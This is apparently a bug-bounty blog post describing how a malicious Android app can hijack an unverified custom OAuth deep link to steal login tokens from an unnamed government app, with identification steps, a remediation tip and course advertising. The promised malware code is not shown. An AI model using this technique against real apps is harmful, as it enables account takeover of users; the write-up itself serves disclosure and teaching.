TALE OF A VULNERABILITY WHICH LEADS TO ACCOUNT TAKEOVER OF GOVERNMENT ANDROID APPLICATION

AGENDA:

. THINGS YOU SHOULD KNOW TO UNDERSTAND THE VULNERABILITY

. DESCRIPTION OF THIS VULNERABILITY

. STEPS TO IDENTIFY

. IMPACT

. CONCLUSION

THINGS TO KNOW TO UNDERSTAND THE VULNERABILITY

1. WHAT IS A DEEP LINK AND HOW DO DEEP LINKS WORK

2. A BASIC UNDERSTANDING ABOUT O-Auth

I REQUEST YOU TO READ MY PREVIOUS BLOG TO UNDERSTAND THE WORKING PRINCIPLE OF THIS VULNERABILITY.

DESCRIPTION :

THESE KINDS OF BUGS OCCUR IN ANY MOBILE APPLICATION INTEGRATED WITH O-AUTH AND CUSTOM DEEPLINK. IF AN APPLICATION TRUSTS THIS O-AUTH AND CUSTOM DEEP-LINK, THERE IS A POSSIBILITY TO EXPLOIT THIS VULNERABILITY.

MISCONFIGURED O-AUTH DEEPLINK WHICH LEADS TO ACCOUNT TAKEOVER

NOTE: THE APPLICATION NAME CANNOT BE DISCLOSED PUBLICLY. Let’s consider the term “ vulnerable app” for a deep understanding of the entire content of this blog.

In this application there are using 3 ways of O-Auth login :

. Google OAuth

. Microsoft OAuth

.Apple ID OAuth

Let’s consider this scenario,

When the user opens the vulnerable application and tries to login with OAuth functionality (specifically Microsoft O-Auth ) it triggers the default browser of your mobile and it asks for Microsoft credentials. On successful login, it will automatically redirect and trigger the application with the help of a custom deep link (this custom deep link contains the user’s OAuth token).

In the previous blog < link > I have already mentioned that some android applications are vulnerable to this attack when the deep link is not properly configured.

Action performed: If the previously mentioned deep link malware application is redesigned, it is possible to hijack the vulnerable application O-Auth deep link.

So Now the malware application is installed on my mobile, the same login process is repeated, but this time the malware application hijacked the deep link with a valid O-Auth token. That’s it by this process the malware application gets hijacked successfully.

For clear understanding :

This is an example of how deep-link looks like :

vulnerableapp://login?token=ffdryur6iukit7tu756

STEPS TO IDENTIFY :

1. CHECK FOR O-AUTH LOGIN IN ANY APPLICATION AND CHECK WHETHER IT TRIGGERS ANY MOBILE BROWSER APPLICATION WHEN YOU TRY TO LOGIN WITH O-AUTH.

2. CHECK WHETHER THE JSON FILE IS PRESENT OR NOT IN THAT PARTICULAR APPLICATION DOMAIN (i.e) https://vulnerable.com/.well-known/assetlinks.json. IF THIS FILE IS NOT PRESENT THEN IT MAY BE VULNERABLE.

3. CREATE THE MALWARE APPLICATION WITH THE SAME VULNERABLE APP DEEPLINK, NOW TRY TO LOGIN WITH O-AUTH.

MALWARE CODE

Integrate this in the android manifest.xml file with your vulnerable app deep link

Main Activity.java code

IMPACT:

USING THIS FLAW THERE IS A HIGH POSSIBILITY TO TAKEOVER THE ACCOUNT

CONCLUSION :

To secure this, kindly add the .well-known/assetlinks.json in the authorized domain. Any O-AUTH login activity should be performed within that application only but if it asks permission to enter credentials in any unknown third-party applications then it is not a safe one to log in.

I hope you understand the impact of this vulnerability. If you wish to learn about mobile app bug bounty, check out the link below

Credits

VULNERABILITY DISCOVERED By:- karthithehacker (Karthikeyan.V)

WRITER:- AGNES RUSALIYA

For further inquiries or more information about this vulnerability, you can reach out to

POC by: @karthithehacker
Mail: contact@karthithehacker.com
Website: https://www.karthithehacker.com/

If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.

For enrolling my cybersecurity and Bugbounty course,

WhatsApp +91 82709 13635.

For VAPT services, reach out at ceo@cappriciosec.com or Contact@cappriciosec.com.

Thank you

Karthikeyan.V